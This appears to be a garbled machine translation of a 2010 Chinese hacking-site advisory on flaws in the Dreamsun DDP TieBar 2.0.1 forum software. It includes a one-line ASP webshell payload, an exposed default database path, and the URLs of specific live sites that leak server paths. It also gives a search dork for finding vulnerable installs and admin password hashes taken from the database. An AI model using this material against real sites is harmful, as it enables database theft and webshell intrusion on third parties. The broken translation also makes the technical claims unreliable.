Dreamcatcher sunshine bar 2. 0. 1 storm database vulnerabilities and related bug-bug warning-the black bar safety net

2010-05-06T00:00:00
ID MYHACK58:62201026861
Type myhack58
Reporter 佚名
Modified 2010-05-06T00:00:00

Description

Today I unintentionally saw this posted it the program, although the program overall is also good Several aspects of the I say. 1. Post title didn't filter null characters 2. so. asp although the presence of injection, Checkstr Filter The’ can't inject, 3. Official there is proof the library /inc/conndb. asa 4. Little limitations of vulnerability, if the library saved asp asa asaspp these suffixes are not filtered<%eval req st("pass")%> it is likely to cause a safety hazard, but the official injected into the filter the better

http://tieba.dreamsun.cn//inc/conndb.asa

describ:’F:\usr\cn27277\inc\#mydb$\#ddptieba20. beris’is not a valid path. Determine the path name is spelled correctly, and whether the connection to the File Storage Server.

Fresher remind all burst paths. http://www.sz0429.cn/ershou/bbs/inc/conndb.asa System Init Error,Please Contact With The Webmaster. 2010-5-5 describ:’f:\freehost\suizhong888\\ershou\bbs\inc\azxcs\#ddptieba.asp’not a valid path. Determine the path name is spelled correctly, and whether the connection to the File Storage Server.

inurl:tzsave. asp Powered by Dreamsun DDP TieBar database/%23ddptieba201. mdb bbuser usename password admin 21232f297a57a5a743894a0e4a801fc3 aaa 21232f297a57a5a743894a0e4a801fc3 e e1671797c52e15f763380b45e841ec32 Explosion path/inc/conndb. asa

There is a small bug, filtering of sensitive words, but seems to write wrong prompt.